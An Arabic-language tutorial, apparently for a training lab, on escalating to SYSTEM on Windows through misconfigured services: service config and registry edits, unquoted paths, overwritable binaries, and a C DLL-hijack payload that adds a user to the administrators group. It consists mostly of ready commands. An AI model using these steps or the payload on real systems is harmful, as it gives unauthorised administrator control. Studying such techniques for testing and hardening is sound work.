Service Exploits

Insecure Service Permission

نفترض فيه service اسمها exploitme ونقدر عن طريقها نرفع صلاحياتنا على المشين كيف نقدر نستغلها؟

اول شي نقدر نستخدم accesschk.exe ولي عن طريقها رح نعرف الصلاحيات الموجودة. من الصورة نقدر نشوف وحدة من الصلاحيات SERVICE_CHANGE_CONFIG وفي هذه الحالة نقدر نعدل على service config

accesschk.exe /accepteula -uwcqv user exploitme

قبل لا نكمل خلونا نتأكد أذا ال service شغالة بصلاحيات SYSTEM

sc qc exploitme

نقدر نعدل على BINARY_PATH_NAME ونخليه مكان ال shell الي سويناه:

sc config exploitme binpath= "\"C:\Users\admin\Downloads\shell.exe\""

نشغل listener و بعدين نشغل ال service ورح ترجع لنا shell بصلاحيات SYSTEM

net start exploitme

Unquoted Service Path

في بعض الاحيان نلاقي اسماء ملفات فيها فراغات وهذا يعتبر خطأ وعن طريقها نقدر نرفع صلاحيتنا. ملاحظة لازم السيرفس شغالة ب SYSTEM

أول شي نبدأ فيه هو نتأكد اذا السيرفس شغالة بصلاحيات اعلى:

sc qc unquotedsvc

نقدر نلاحظ ان مكان المخزن فيه السيرفس يحتوي على فراغات BINARY_PATH_NAME نقدر الان نستخدم accesschk.exe ونتأكد اذا نقدر نعدل على هذا الملف:

accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

اليوزر الخاص فينا من ضمن ال BUILTIN GROUP

نقدر الان ننسخ الشيل الخاص فينا الى هذا الملف:

copy C:\Users\user\Desktop\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

تقدر تعدل على الاسم نفس ما انا سويت

نشغل ال listener و نشغل السيرفس رح ترجع لنا شيل بصلاحيات SYSTEM

net start unqoutedsvc

Weak Registry Permissions

في ال Windows السيرفس تتسجل مكانها في ال Registry files في بعض الاحيان نقدر نعدل مكان تخزين السيرفس ونرفع صلاحيتنا ولكن هذه الطريقة نادرة لأن فقط ال admins الي يقدرون يعدلون عليها.

نقدر اول شي نتأكد اذا السيرفس شغالة بصلاحيات اعلى:

sc qc regsvc

الان نستخدم accesschk.exe حتى نتأكد اذا نقدر نكتب على Registry

accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

نقدر نشوف ان NT AUTHORITY\INTERACTIVE Group تقدر تكتب على Registry السيرفس واليوزر الي نستخدمه من ضمنها. نقدر الان نعدل على ImagePath ونخلي مكانه ملف الشيل:

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Users\user\Desktop\reverse.exe /f

نقدر نشغل السيرفس ورح ترجع لنا شيل بصلاحيات SYSTEM:

net start regsvc

Insecure Service Executables

نتاكد من السيرفس شغالة بصلاحيات اعلى:

sc qc filepermsvc

نستخدم accesschk.exe عشان نشوف الصلاحيات اليوزر الحالي على السيرفس:

accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

نقدر نشوف اليوزر يقدر يعدل على BINARY_PATH_NAME

ننسخ ملف الشيل ونغير اسمه الى نفس اسم السيرفس:

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

اذا شغلت السيرفس رح ترجع لك شيل بصلاحيات SYSTEM

net start filepermsvc

DLL Hijacking

بعض السيرفس تستخدم DLL FILES ونقدر عن طريقها نرفع صلاحيتنا على المشين. وحدة من الطرق هي عبارة عن استخدام Process Montor رح تحتاج صلاحيات لاستخدامه. أذا شغلنا السيرفس رح نلاحض الفايل hijackme.dll مو موجود و مكان الفايل نقدر نكتب فيه:

sc start dllsvc

تقدرون تستخدمون هذا الكود و اذا اردتم التعديل كل الي عليكم تعدلون عليه هو ()system

hijackme.c:

// For x64 compile with: x86_64-w64-mingw32-gcc input.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc input.c -shared -o output.dll

#include <windows.h>

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
    if (dwReason == DLL_PROCESS_ATTACH) {
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);
    }
    return TRUE;
}

نقدر الان نسوي compile:

x86_64-w64-mingw32-gcc hijackme.c -shared -o hijackme.dll

ننسخ الفايل الى C:\Temp ونرجع انشغل السيرفس:

sc start dllsvc

الان اليوزر تم اضافته الى ال admin group:

net localgroup administrators